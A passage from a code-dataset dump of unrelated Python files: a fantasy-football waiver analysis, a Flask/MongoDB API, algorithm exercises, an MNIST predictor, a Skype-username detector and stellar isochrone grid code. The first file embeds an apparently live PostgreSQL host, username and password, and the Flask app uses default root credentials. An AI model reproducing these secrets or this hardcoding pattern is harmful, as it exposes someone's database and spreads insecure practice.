psycopg2\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# Connect to your PostgreSQL database\ntry:\n\n conn = psycopg2.connect(\n host='ec2-34-199-68-114.compute-1.amazonaws.com',\n user='oibdolfaruxway',\n password='5983be3a6ab94c50df024487d2c3bcbab6a2eca9a8b4c594ddaf0b934a5553cc',\n database='d4qgddmcqs7su1'\n )\n curr = conn.cursor()\n\n\nexcept Exception as e:\n print(\"Couldn't connect \", e)\n\n\n####\n# LIMIT BELOW SHOW THE NUMBER OF PLAYERS FEATURES\n\n# Base SQL query without the week condition\nbase_sql = \"\"\"\nSELECT \n at.*, \n ap.*, \n AVG(ab.value) AS avg_value\nFROM \n api_bid AS ab\nJOIN \n api_target AS at ON ab.target_id = at.id\nJOIN\n api_player AS ap ON at.player_id = ap.id\nWHERE \n ab.week = %s\nGROUP BY \n at.id, ap.id\nORDER BY \n avg_value DESC\nLIMIT 3;\n\"\"\"\n\n# Iterate from week 2 to week 13\ntop_arr = []\ncost_arry = []\nweekly_sum = 0 \nweekly_cost = 0\nfor week in range(2, 16):\n top_arr.append(weekly_sum/5)\n cost_arry.append(weekly_cost/5)\n weekly_sum = 0 \n weekly_cost = 0\n df = pd.read_sql(base_sql, conn, params=[week]) # Use params for SQL parameter substitution\n\n # Assuming you want to print names for each week's results\n print(f\"Week {week} Names:\")\n for index, row in df.iterrows():\n\n player_name = row['name']\n cost = row['avg_value']\n \n \n # Read the CSV into a DataFrame\n df = pd.read_csv('2022_year_scores.csv')\n\n # Replace '-' with 0 (leaving 'BYE' intact)\n df.replace('-', 0, inplace=True)\n\n # Convert columns 6 through 21 to float where possible\n # For 'BYE' entries, we'll set them to NaN temporarily for accurate average calculation\n for col in df.columns[3 + week :21]: # indices 5 to 20 for columns 6 to 21 (0-based)\n df[col] = pd.to_numeric(df[col], errors='coerce')\n try: \n # Find the row corresponding to the specified player name\n player_row = df[df['Player'] == player_name]\n\n # Extract columns 6 through 21 and compute the average\n # The mean method will automatically skip NaN values (which represent 'BYE' in our case)\n average_value = player_row.iloc[:, 3 + week:21].mean(axis=1).values[0]\n weekly_sum = average_value + weekly_sum\n\n weekly_cost = cost + weekly_cost\n \n \n print(f\"Average value for {player_name} starting after week {week} is {average_value:.2f}\")\n except:\n continue\n\nscores_arry = top_arr[1:]\n# Get the adjusted indices (index + 2)\nindices = [i for i in range(2, len(scores_arry) +2)]\nconn.close()\n# Plot the numbers against the adjusted indices\nplt.plot(indices, scores_arry)\n\n# Add title and labels\nplt.title(\"Waiver Week vs. Avg. Weekly Points After Acquiring \")\nplt.xlabel(\"Upcoming Week\")\nplt.ylabel(\"Weekly Avg. Points After Acquisition\")\n\n# Display the plot\nplt.show()\n\n\n\n\n# Close the connection\n\n\n\n# # View the DataFrame\n","repo_name":"freemanwsmith3/thefaablab","sub_path":"faab/faab/yearly_scores.py","file_name":"yearly_scores.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70800995572","text":"from bson import json_util\nfrom flask import Flask, jsonify, request\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\n\nMONGO_HOST = 'nosqldb'\nMONGO_PORT = 27017\nMONGO_DB = 'admin'\nMONGO_USERNAME = 'root'\nMONGO_PASSWORD = 'example'\n\nclient: MongoClient = MongoClient(\n MONGO_HOST,\n MONGO_PORT,\n username=MONGO_USERNAME,\n password=MONGO_PASSWORD,\n authSource=MONGO_DB\n)\ndb = client[MONGO_DB]\n\ncollection = db.mycollection\n\n\n@app.route('/', methods=['GET', 'PUT'])\ndef manage_data_update_get(key):\n if request.method == 'PUT':\n new_value = request.get_json()\n new_value = new_value.get(key)\n if not new_value:\n return jsonify(\n {'message': f'Такого ключа {key} не существует'}\n ), 400\n collection.update_one(\n {key: {\"$exists\": True}}, {\"$set\": {key: new_value}}\n )\n return jsonify({key: new_value}), 200\n else:\n data = collection.find_one({key: {\"$exists\": True}})\n if data:\n return json_util.dumps({key: data[key]})\n else:\n return jsonify({\"message\": \"Data not found\"}), 404\n\n\n@app.route('/', methods=['POST'])\ndef manage_date_create():\n if request.method == 'POST':\n data = request.get_json()\n key = list(data.keys())[0]\n check_key = collection.find_one({key: {\"$exists\": True}})\n if check_key:\n return jsonify({\"message\": \"Такой ключ уже создан\"}), 400\n collection.insert_one(data)\n return jsonify({\"message\": \"Data created\"}), 201\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080)\n","repo_name":"vomerf/two_tasks","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10450766062","text":"# 1863 스카이라인\n\nimport sys\n\ndef sol():\n case = int(sys.stdin.readline())\n stack = []\n count = 0\n for i in range(case):\n x,y = map(int,sys.stdin.readline().split())\n\n while(stack and stack[-1][1] > y):\n stack.pop()\n count += 1\n if not stack:\n if y != 0 :\n stack.append((x,y))\n\n elif stack[-1][1]< y:\n stack.append((x,y))\n\n # 스택에 한 개 이상 남을 수 있는지? (그치... 오름 차순인 경우 그럴 수 있지)\n if stack:\n count += len(stack)\n\n return count\n\nprint(sol())\n","repo_name":"inkyu0103/BOJ","sub_path":"DataStructure/1863.py","file_name":"1863.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28323343955","text":"import os\nimport numpy as np\nimport cv2\nimport torch\nimport torchvision\nfrom model import Model\nfrom argparse import *\n\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\"--device\", default=\"cpu\", type=str)\n parser.add_argument(\"--input_img\",default=\"5.jpg\", type=str)\n args = parser.parse_args()\n\n device=torch.device(args.device)\n\n transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((0), (1)),\n ])\n\n img = cv2.imread(args.input_img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (70, 70))\n\n tensor = transform(img).unsqueeze(0).to(device)\n\n model = Model()\n model = model.to(device)\n model.load_state_dict(torch.load(\"mnist_p.pth\"))\n model.eval()\n\n pred = model(tensor)\n pred = pred.cpu().detach().numpy()\n output = np.argmax(pred)\n\n print(f\"model prediction: {output}\")","repo_name":"ganjbakhshali/mnist_presian","sub_path":"elavuate.py","file_name":"elavuate.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27316008892","text":"import citiesRepo\nimport TouristDestinationModel\nimport sqlite3\n\ncities = TouristDestinationModel.TouristDestination(None, \"Kangra\", \"Shimla\", \"Chamba\", \"test\",\n \"9\", \"9\", \"1000Rs\", \"100$\", \"100\",\n \"100\", \"100\", \"100\", \"100\", \"100\", \"100\")\n\nclass Repo():\n def __init__(self):\n try:\n self.conn = sqlite3.connect('..\\database.db')\n self.conn.row_factory = sqlite3.Row\n self.cur = self.conn.cursor()\n print(\"Opened database successfully\")\n except Exception as e:\n print(e)\n\n def __del__(self):\n try:\n self.conn.close()\n print(\"Database Closed successfully\")\n except Exception as e:\n print(e)\ndb1 = Repo()\ndb = citiesRepo.Repo(db1)\ndb.createCityTable()\n\ndb.addCity(\"KARERI LAKE\", \"Himachal Pradesh\")\n#db.deleteUserById(user1.userid)\n\nusers = db.getAllCities()\nprint(\"cities =\", users)","repo_name":"itsaseemsharma/Explorehimachal","sub_path":"Explorehimachal/modules/TouristsDestination/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38865897804","text":"import re\n\nimport nltk\nimport textblob\n\nfrom .base import RegexDetector\nfrom ..filth import SkypeFilth\n\n\nclass SkypeDetector(RegexDetector):\n \"\"\"Skype usernames tend to be used inline in dirty dirty text quite\n often but also appear as ``skype: {{SKYPE}}`` quite a bit. This method\n looks at words within ``word_radius`` words of \"skype\" for things that\n appear to be misspelled or have punctuation in them as a means to\n identify skype usernames.\n\n Default ``word_radius`` is 10, corresponding with the rough scale of\n half of a sentence before or after the word \"skype\" is used. Increasing\n the ``word_radius`` will increase the false positive rate and\n decreasing the ``word_radius`` will increase the false negative rate.\n \"\"\"\n filth_cls = SkypeFilth\n\n word_radius = 10\n\n def iter_filth(self, text):\n\n # find 'skype' in the text using a customized tokenizer. this makes\n # sure that all valid skype usernames are kept as tokens and not split\n # into different words\n tokenizer = nltk.tokenize.regexp.RegexpTokenizer(\n self.filth_cls.SKYPE_TOKEN\n )\n blob = textblob.TextBlob(text, tokenizer=tokenizer)\n skype_indices, tokens = [], []\n for i, token in enumerate(blob.tokens):\n tokens.append(token)\n if 'skype' in token.lower():\n skype_indices.append(i)\n\n # go through the words before and after skype words to identify\n # potential skype usernames.\n skype_usernames = []\n for i in skype_indices:\n jmin = max(i-self.word_radius, 0)\n jmax = min(i+self.word_radius+1, len(tokens))\n for j in list(range(jmin, i)) + list(range(i+1, jmax)):\n token = tokens[j]\n if self.filth_cls.SKYPE_USERNAME.match(token):\n\n # this token is a valid skype username. Most skype\n # usernames appear to be misspelled words. Word.spellcheck\n # does not handle the situation of an all caps word very\n # well, so we cast these to all lower case before checking\n # whether the word is misspelled\n if token.isupper():\n token = token.lower()\n word = textblob.Word(token)\n suggestions = word.spellcheck()\n corrected_word, score = suggestions[0]\n if score < 0.5:\n skype_usernames.append(token)\n\n # replace all skype usernames\n if skype_usernames:\n self.filth_cls.regex = re.compile('|'.join(skype_usernames))\n else:\n self.filth_cls.regex = None\n return super(SkypeDetector, self).iter_filth(text)\n","repo_name":"asimakos/text.anonymization","sub_path":"venv/Lib/site-packages/scrubadub/detectors/skype.py","file_name":"skype.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22414775181","text":"#import time\r\nimport numpy as np\r\n#from scipy.special import eval_legendre as lp\r\nimport matplotlib.pyplot as plt\r\nfrom rt_002_polleg import polleg\r\n#==============================================================================\r\n#\r\nif __name__ == \"__main__\":\r\n# scattering angle & cosine\r\n sca = np.linspace(0.0, 180.0, 181)\r\n x = np.cos(np.radians(sca))\r\n# Rayleigh phase function\r\n r = 0.75*(1.0 + x*x)\r\n# expansion moments for the Rayleigh phase function: 2k+1 is INCLUDED\r\n xk_r = np.array([1.0, 0.0, 0.5])\r\n nk = len(xk_r)\r\n# restore Rayleigh phase function from moments: 3 different options\r\n pk = polleg(x, nk-1) # recall, k = 0,1,2 hence nk-1; not sure if the built-in eval_legendre is better\r\n rx_opt1 = np.dot(xk_r, pk) # this looks nice, but NOT efficient because ...\r\n#\r\n rx_opt2 = np.zeros_like(rx_opt1)\r\n for ik in range(nk): # we ALREADY HAVE this loop in polleg!\r\n for ix in range(len(x)): # we ALREADY HAVE this loop in polleg AS WELL!!\r\n rx_opt2[ix] += xk_r[ik]*pk[ik,ix]\r\n#\r\n# Less nice, a bit harder to understand, but efficient way is:\r\n# compute Legendre polynomials \"on the go\"\r\n rx_opt3 = np.zeros_like(rx_opt1)\r\n for ix in range(len(x)):\r\n xi = x[ix] # avoids addressing to an array\r\n rxi = 1.0 # xk[k=0]*Pk[k=0] + xk[1]*Pk[k=1] = 1*1 + 0*x\r\n p0 = 1.0 # for Pk-recurrence\r\n p1 = xi # for Pk-recurrence\r\n for ik in range(2, nk): #\r\n p2 = (2.0 - 1.0/ik)*xi*p1 - (1.0 - 1.0/ik)*p0 # recurrence\r\n rxi += xk_r[ik]*p2 # accumulation - can not be fully vectorized :( \r\n p0 = p1 # for Pk-recurrence\r\n p1 = p2 # for Pk-recurrence\r\n rx_opt3[ix] = rxi # avoids addressing to an array inside the ik-loop\r\n#\r\n plt.figure()\r\n plt.plot(sca, r, 'k', sca[0::10], rx_opt1[0::10], 'ro',\\\r\n sca[2::10], rx_opt2[2::10], 'go', sca[4::10], rx_opt3[4::10], 'bo')\r\n plt.title('Rayleigh phase function')\r\n plt.xlabel('scattering angle, deg.')\r\n plt.legend(['explicit formula', 'from moments, xk: opt.1', 'from moments, xk: opt.2', 'from moments, xk: opt.3'])\r\n plt.grid(True)","repo_name":"amiribr/General-Radiative-Transfer","sub_path":"rt_003_phasefun.py","file_name":"rt_003_phasefun.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1659558236","text":"from time import sleep\nfrom collections import deque\nfrom pprint import pprint\nimport sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\nL, C = map(int, input().split())\nS = sorted(input().rstrip().split())\n\n\ndef dfs(pos, n, con1, con2, l):\n if n == L:\n if con1 >= 1 and con2 >= 2:\n print(''.join(l))\n\n for i in range(pos, C):\n l.append(S[i])\n if S[i] in 'aeiou':\n con1 += 1\n else:\n con2 += 1\n dfs(i+1, n+1, con1, con2, l)\n if S[i] in 'aeiou':\n con1 -= 1\n else:\n con2 -= 1\n l.pop()\n\n\ndfs(0, 0, 0, 0, [])\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"윤효전/210916/1759.py","file_name":"1759.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"42183480273","text":"import os\nimport re\nimport glob\nimport itertools\nfrom functools import partial\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom scipy.optimize import curve_fit\n\nfrom isochrones.config import ISOCHRONES\n\nfrom ..models import StellarModelGrid\nfrom ..eep import fit_section_poly, eep_fn, eep_jac, eep_fn_p0\nfrom .eep import max_eep\nfrom ..interp import DFInterpolator, searchsorted\nfrom ..utils import polyval\nfrom .eep import max_eep\nfrom ..logger import getLogger\n\n\nclass MISTModelGrid(StellarModelGrid):\n name = \"mist\"\n eep_col = \"EEP\"\n age_col = \"log10_isochrone_age_yr\"\n feh_col = \"[Fe/H]\"\n mass_col = \"star_mass\"\n initial_mass_col = \"initial_mass\"\n logTeff_col = \"log_Teff\"\n logg_col = \"log_g\"\n logL_col = \"log_L\"\n\n default_kwargs = {\"version\": \"1.2\", \"vvcrit\": 0.4, \"kind\": \"full_isos\"}\n default_columns = StellarModelGrid.default_columns + (\"delta_nu\", \"nu_max\", \"phase\")\n\n bounds = ((\"age\", (5, 10.13)), (\"feh\", (-4, 0.5)), (\"eep\", (0, 1710)), (\"mass\", (0.1, 300)))\n\n fehs = np.array(\n (\n -4.00,\n -3.50,\n -3.00,\n -2.50,\n -2.00,\n -1.75,\n -1.50,\n -1.25,\n -1.00,\n -0.75,\n -0.50,\n -0.25,\n 0.00,\n 0.25,\n 0.50,\n )\n )\n n_fehs = 15\n\n primary_eeps = (1, 202, 353, 454, 605, 631, 707, 808, 1409, 1710)\n eep_labels = (\"PMS\", \"ZAMS\", \"IAMS\", \"TAMS\", \"RGBTip\", \"ZAHB\", \"TAHB\", \"TPAGB\", \"post-AGB\", \"WDCS\")\n eep_labels_highmass = (\"PMS\", \"ZAMS\", \"IAMS\", \"TAMS\", \"RGBTip\", \"ZACHeB\", \"TACHeB\", \"C-burn\")\n n_eep = 1710\n\n @property\n def foo(self):\n return self._foo\n\n def max_eep(self, mass, feh):\n return max_eep(mass, feh)\n\n @property\n def eep_sections(self):\n return [(a, b) for a, b in zip(self.primary_eeps[:-1], self.primary_eeps[1:])]\n\n @property\n def kwarg_tag(self):\n return \"_v{version}_vvcrit{vvcrit}\".format(**self.kwargs)\n\n def compute_additional_columns(self, df):\n \"\"\"\n \"\"\"\n df = super().compute_additional_columns(df)\n df[\"feh\"] = df[\"log_surf_z\"] - np.log10(df[\"surface_h1\"]) - np.log10(0.0181) # Aaron Dotter says\n return df\n\n\nclass MISTIsochroneGrid(MISTModelGrid):\n eep_col = \"EEP\"\n age_col = \"log10_isochrone_age_yr\"\n feh_col = \"[Fe/H]\"\n mass_col = \"star_mass\"\n initial_mass_col = \"initial_mass\"\n logTeff_col = \"log_Teff\"\n logg_col = \"log_g\"\n logL_col = \"log_L\"\n\n default_kwargs = {\"version\": \"1.2\", \"vvcrit\": 0.4, \"kind\": \"full_isos\"}\n index_cols = (\"log10_isochrone_age_yr\", \"feh\", \"EEP\")\n\n filename_pattern = \"\\.iso\"\n eep_replaces = \"mass\"\n\n @property\n def kwarg_tag(self):\n tag = super().kwarg_tag\n return \"{tag}_{kind}\".format(tag=tag, **self.kwargs)\n\n def get_directory_path(self, **kwargs):\n return os.path.join(self.datadir, \"MIST{}\".format(self.kwarg_tag))\n\n def get_tarball_file(self, **kwargs):\n filename = self.get_directory_path(**kwargs)\n return \"{}.txz\".format(filename)\n\n def get_tarball_url(self, **kwargs):\n \"\"\"\n e.g.\n http://waps.cfa.harvard.edu/MIST/data/tarballs_v1.2/MIST_v1.2_vvcrit0.4_full_isos.txz\n \"\"\"\n return (\n \"http://waps.cfa.harvard.edu/MIST/data/tarballs\"\n + \"_v{version}/MIST_v{version}_vvcrit{vvcrit}_{kind}.txz\".format(**self.kwargs)\n )\n\n @classmethod\n def get_feh(cls, filename):\n m = re.search(r\"feh_([mp])([0-9]\\.[0-9]{2})_afe\", filename)\n if m:\n sign = 1 if m.group(1) == \"p\" else -1\n return float(m.group(2)) * sign\n else:\n raise ValueError(\"{} not a valid MIST file? Cannnot parse [Fe/H]\".format(filename))\n\n @classmethod\n def to_df(cls, filename):\n with open(filename, \"r\", encoding=\"latin-1\") as fin:\n while True:\n line = fin.readline()\n if re.match(\"# EEP\", line):\n column_names = line[1:].split()\n break\n feh = cls.get_feh(filename)\n df = pd.read_csv(\n filename, comment=\"#\", delim_whitespace=True, skip_blank_lines=True, names=column_names\n )\n df[\"feh\"] = feh\n return df\n\n\nclass MISTBasicIsochroneGrid(MISTIsochroneGrid):\n\n default_kwargs = {\"version\": \"1.2\", \"vvcrit\": 0.4, \"kind\": \"basic_isos\"}\n default_columns = StellarModelGrid.default_columns + (\"phase\",)\n\n def compute_additional_columns(self, df):\n \"\"\"\n \"\"\"\n df = StellarModelGrid.compute_additional_columns(self, df)\n # df['feh'] = df['log_surf_z'] - np.log10(df['surface_h1']) - np.log10(0.0181) # Aaron Dotter says\n return df\n\n\nclass MISTEvolutionTrackGrid(MISTModelGrid):\n default_kwargs = {\"version\": \"1.2\", \"vvcrit\": 0.4, \"afe\": 0.0}\n\n index_cols = (\"initial_feh\", \"initial_mass\", \"EEP\")\n\n default_columns = tuple(set(MISTModelGrid.default_columns) - {\"age\"}) + (\n \"interpolated\",\n \"star_age\",\n \"age\",\n )\n\n eep_replaces = \"age\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._fehs = None\n self._masses = None\n\n self._approx_eep_interp = None\n self._eep_interps = None\n self._primary_eeps_arr = None\n\n @property\n def masses(self):\n if self._masses is None:\n self._masses = np.array(self.df.index.levels[1])\n return self._masses\n\n # @property\n # def fehs(self):\n # if self._fehs is None:\n # self._fehs = np.array(self.df.index.levels[0])\n # return self._fehs\n\n @property\n def datadir(self):\n return os.path.join(ISOCHRONES, self.name, \"tracks\")\n\n @property\n def kwarg_tag(self):\n return \"_v{version}_vvcrit{vvcrit}\".format(**self.kwargs)\n\n @property\n def prop_map(self):\n return dict(\n eep=self.eep_col,\n mass=self.mass_col,\n initial_mass=self.initial_mass_col,\n logTeff=self.logTeff_col,\n logg=self.logg_col,\n logL=self.logL_col,\n )\n\n def compute_additional_columns(self, df):\n \"\"\"\n \"\"\"\n df = super().compute_additional_columns(df)\n df[\"age\"] = np.log10(df[\"star_age\"])\n return df\n\n def get_file_basename(self, feh):\n feh_sign = \"m\" if feh < 0 else \"p\"\n afe = self.kwargs[\"afe\"]\n afe_sign = \"m\" if afe < 0 else \"p\"\n fmt_dict = self.kwargs.copy()\n fmt_dict.update(\n dict(feh=abs(feh), feh_sign=feh_sign, afe_sign=afe_sign, afe=abs(self.kwargs[\"afe\"]))\n )\n return \"MIST_v{version}_feh_{feh_sign}{feh:.2f}_afe_{afe_sign}{afe:.1f}_vvcrit{vvcrit:.1f}_EEPS\".format(\n **fmt_dict\n )\n\n def get_directory_path(self, feh):\n basename = self.get_file_basename(feh)\n return os.path.join(self.datadir, basename)\n\n def get_tarball_url(self, feh):\n basename = self.get_file_basename(feh)\n version = self.kwargs[\"version\"]\n return \"http://waps.cfa.harvard.edu/MIST/data/tarballs_v{version}/{basename}.txz\".format(\n version=version, basename=basename\n )\n return os.path.join(self.datadir, \"{}.txz\".format(basename))\n\n def get_tarball_file(self, feh):\n basename = self.get_file_basename(feh)\n return os.path.join(self.datadir, \"{}.txz\".format(basename))\n\n def download_and_extract_all(self):\n for feh in self.fehs:\n self.extract_tarball(feh=feh)\n\n @classmethod\n def get_mass(cls, filename):\n m = re.search(\"(\\d{5})M.track.eep\", filename)\n if m:\n return float(m.group(1)) / 100.0\n else:\n raise ValueError(\"Cannot parse mass from {}.\".format(filename))\n\n @classmethod\n def to_df(cls, filename):\n with open(filename, \"r\", encoding=\"latin-1\") as fin:\n while True:\n line = fin.readline()\n if re.match(\"^# EEPs\", line):\n line = line.split()\n eep_first = int(line[2])\n eep_last = int(line[-1])\n elif re.match(\"#\\s+ star_age\", line):\n column_names = line[1:].split()\n break\n initial_mass = cls.get_mass(filename)\n df = pd.read_csv(\n filename, comment=\"#\", delim_whitespace=True, skip_blank_lines=True, names=column_names\n )\n df[\"initial_mass\"] = initial_mass\n try:\n df[\"EEP\"] = np.arange(eep_first, eep_last + 1, dtype=int)\n except ValueError:\n print(\n \"len(df) is {}; first, last eeps are {}, {} ({})\".format(\n len(df), eep_first, eep_last, filename\n )\n )\n return df\n\n def get_feh_filenames(self, feh):\n directory = self.get_directory_path(feh)\n if not os.path.exists(directory):\n self.extract_tarball(feh=feh)\n return glob.glob(os.path.join(directory, \"*.track.eep\"))\n\n def get_feh_hdf_filename(self, feh):\n directory = self.get_directory_path(feh)\n return os.path.join(directory, \"all_masses.h5\")\n\n def get_feh_interpolated_hdf_filename(self, feh):\n directory = self.get_directory_path(feh)\n return os.path.join(directory, \"all_masses_interpolated.h5\")\n\n def df_all_feh(self, feh):\n hdf_filename = self.get_feh_hdf_filename(feh)\n if os.path.exists(hdf_filename):\n df = pd.read_hdf(hdf_filename, \"df\")\n else:\n df = pd.concat([self.to_df(f) for f in self.get_feh_filenames(feh)])\n df[\"initial_feh\"] = feh\n df = df.sort_values(by=list(self.index_cols))\n df.index = [df[c] for c in self.index_cols]\n df.to_hdf(hdf_filename, \"df\")\n df = pd.read_hdf(hdf_filename, \"df\")\n return df\n\n def df_all_feh_interpolated(self, feh):\n \"\"\"Same as df_all_feh but with missing track tails interpolated\n \"\"\"\n hdf_filename = self.get_feh_interpolated_hdf_filename(feh)\n if os.path.exists(hdf_filename):\n df_interp = pd.read_hdf(hdf_filename, \"df\")\n else:\n getLogger().info(\"Interpolating incomplete tracks for feh = {}\".format(feh))\n df = self.df_all_feh(feh)\n df_interp = df.copy()\n df_interp[\"interpolated\"] = False\n masses = df.index.levels[1]\n for i, m in tqdm(\n enumerate(masses),\n total=len(masses),\n desc=\"interpolating missing values in evolution tracks (feh={})'\".format(feh),\n ):\n n_eep = len(df.xs(m, level=\"initial_mass\"))\n eep_max = max_eep(m, feh)\n if not eep_max:\n raise ValueError(\"No eep_max return value for ({}, {})?\".format(m, feh))\n if n_eep < eep_max:\n\n # Find lower limit\n ilo = i\n found_lower = False\n while not found_lower:\n ilo -= 1\n mlo = masses[ilo]\n nlo = len(df.xs(mlo, level=\"initial_mass\"))\n if nlo >= eep_max:\n found_lower = True\n if ilo == 0:\n raise ValueError(\"Did not find mlo for ({}, {})\".format(m, feh))\n\n # Find upper limit\n ihi = i\n found_upper = False\n while not found_upper:\n ihi += 1\n mhi = masses[ihi]\n nhi = len(df.xs(mhi, level=\"initial_mass\"))\n if nhi >= eep_max:\n found_upper = True\n if ihi > len(masses):\n raise ValueError(\"Did not find mhi for ({}, {})\".format(m, feh))\n\n getLogger().info(\n \"{}: {} (expected {}). Interpolating between {} and {}\".format(\n m, n_eep, eep_max, mlo, mhi\n )\n )\n new_eeps = np.arange(n_eep + 1, eep_max + 1)\n new_index = pd.MultiIndex.from_product([[feh], [m], new_eeps])\n new_data = pd.DataFrame(index=new_index, columns=df_interp.columns, dtype=float)\n\n # Interpolate values\n norm_distance = (m - mlo) / (mhi - mlo)\n lo_index = pd.MultiIndex.from_product([[feh], [mlo], new_eeps])\n hi_index = pd.MultiIndex.from_product([[feh], [mhi], new_eeps])\n new_data.loc[:, df.columns] = (\n df.loc[lo_index, :].values * (1 - norm_distance)\n + df.loc[hi_index, :].values * norm_distance\n )\n new_data.loc[:, \"interpolated\"] = True\n df_interp = pd.concat([df_interp, new_data])\n\n df_interp.sort_index(inplace=True)\n df_interp.to_hdf(hdf_filename, \"df\")\n df_interp = pd.read_hdf(hdf_filename, \"df\")\n\n return df_interp\n\n def df_all(self):\n df = pd.concat([self.df_all_feh_interpolated(feh) for feh in self.fehs])\n return df\n\n @property\n def df(self):\n if self._df is None:\n self._df = self.read_hdf()\n self._df[\"dt_deep\"] = self.get_dt_deep()\n\n return self._df\n\n def get_dt_deep(self, compute=False):\n filename = os.path.join(self.datadir, \"dt_deep{}.h5\".format(self.kwarg_tag))\n\n compute = not os.path.exists(filename)\n\n if not compute:\n try:\n dt_deep = pd.read_hdf(filename, \"dt_deep\")\n except Exception:\n compute = True\n\n if compute:\n # need grid to work with first\n df = self.get_df()\n\n # Make bucket for derivative to go in\n df[\"dt_deep\"] = np.nan\n\n # Compute derivative for each (feh, age) isochrone, and fill in\n for f, m in tqdm(\n itertools.product(*df.index.levels[:2]),\n total=len(list(itertools.product(*df.index.levels[:2]))),\n desc=\"Computing dt/deep\",\n ):\n subdf = df.loc[f, m]\n log_age = np.log10(subdf[\"star_age\"])\n deriv = np.gradient(log_age, subdf[\"eep\"])\n subdf.loc[:, \"dt_deep\"] = deriv\n\n df.dt_deep.to_hdf(filename, \"dt_deep\")\n dt_deep = pd.read_hdf(filename, \"dt_deep\")\n\n return dt_deep\n\n @property\n def eep_param_filename(self):\n return os.path.join(self.datadir, \"eep_params{}.h5\".format(self.kwarg_tag))\n\n def fit_eep_section(self, a, b, order=3):\n fehs = self.df.index.levels[0]\n ms = self.df.index.levels[1]\n columns = [\"p{}\".format(o) for o in range(order + 1)]\n p_df = pd.DataFrame(index=pd.MultiIndex.from_product((fehs, ms)), columns=columns)\n\n for feh, m in tqdm(\n itertools.product(fehs, ms),\n total=len(fehs) * len(ms),\n desc=\"Fitting age-eep relation for eeps {:.0f} to {:.0f} (order {})\".format(a, b, order),\n ):\n subdf = self.df.xs((feh, m), level=(\"initial_feh\", \"initial_mass\"))\n try:\n p = fit_section_poly(subdf.age.values, subdf.eep.values, a, b, order)\n except (TypeError, ValueError):\n p = [np.nan] * (order + 1)\n for c, n in zip(p, range(order + 1)):\n p_df.at[(feh, m), \"p{}\".format(n)] = c\n return p_df\n\n def fit_approx_eep(self, max_fit_eep=808):\n fehs = self.df.index.levels[0]\n ms = self.df.index.levels[1]\n columns = [\"p5\", \"p4\", \"p3\", \"p2\", \"p1\", \"p0\", \"A\", \"x0\", \"tau\"]\n par_df = pd.DataFrame(index=pd.MultiIndex.from_product((fehs, ms)), columns=columns)\n for feh, m in tqdm(\n itertools.product(fehs, ms),\n total=len(fehs) * len(ms),\n desc=\"Fitting approximate eep(age) function\",\n ):\n subdf = self.df.xs((feh, m), level=(\"initial_feh\", \"initial_mass\"))\n p0 = eep_fn_p0(subdf.age, subdf.eep)\n last_pfit = p0\n mask = subdf.eep < max_fit_eep\n try:\n if subdf.eep.max() < 500:\n raise RuntimeError\n pfit, _ = curve_fit(eep_fn, subdf.age.values[mask], subdf.eep.values[mask], p0, jac=eep_jac)\n except RuntimeError: # if the full fit barfs, just use the polynomial by setting A to zero, and the rest same as previous.\n pfit = list(np.polyfit(subdf.age.values[mask], subdf.eep.values[mask], 5)) + last_pfit[-3:]\n pfit[-3] = 0\n last_pfit = pfit\n par_df.loc[(feh, m), :] = pfit\n return par_df.astype(float)\n\n def write_eep_params(self, orders=None):\n if orders is None:\n orders = [7] * 2 + [3] + [1] * 6\n\n p_dfs = [self.fit_eep_section(a, b, order=o) for (a, b), o in zip(self.eep_sections, orders)]\n for df, (a, b) in zip(p_dfs, self.eep_sections):\n df.to_hdf(self.eep_param_filename, \"eep_{:.0f}_{:.0f}\".format(a, b))\n\n p_approx_df = self.fit_approx_eep()\n p_approx_df.to_hdf(self.eep_param_filename, \"approx\")\n\n def get_eep_interps(self):\n \"\"\"Get list of interp functions for piecewise polynomial params\n \"\"\"\n if not os.path.exists(self.eep_param_filename):\n self.write_eep_params()\n\n with pd.HDFStore(self.eep_param_filename) as store:\n interps = [DFInterpolator(store[\"eep_{:.0f}_{:.0f}\".format(a, b)]) for a, b in self.eep_sections]\n return interps\n\n def get_approx_eep_interp(self):\n if not os.path.exists(self.eep_param_filename):\n self.write_eep_params()\n\n with pd.HDFStore(self.eep_param_filename) as store:\n interp = DFInterpolator(store[\"approx\"])\n\n return interp\n\n @property\n def approx_eep_interp(self):\n if self._approx_eep_interp is None:\n self._approx_eep_interp = self.get_approx_eep_interp()\n\n return self._approx_eep_interp\n\n @property\n def eep_interps(self):\n if self._eep_interps is None:\n self._eep_interps = self.get_eep_interps()\n\n return self._eep_interps\n\n @property\n def primary_eeps_arr(self):\n if self._primary_eeps_arr is None:\n self._primary_eeps_arr = np.array(self.primary_eeps)\n return 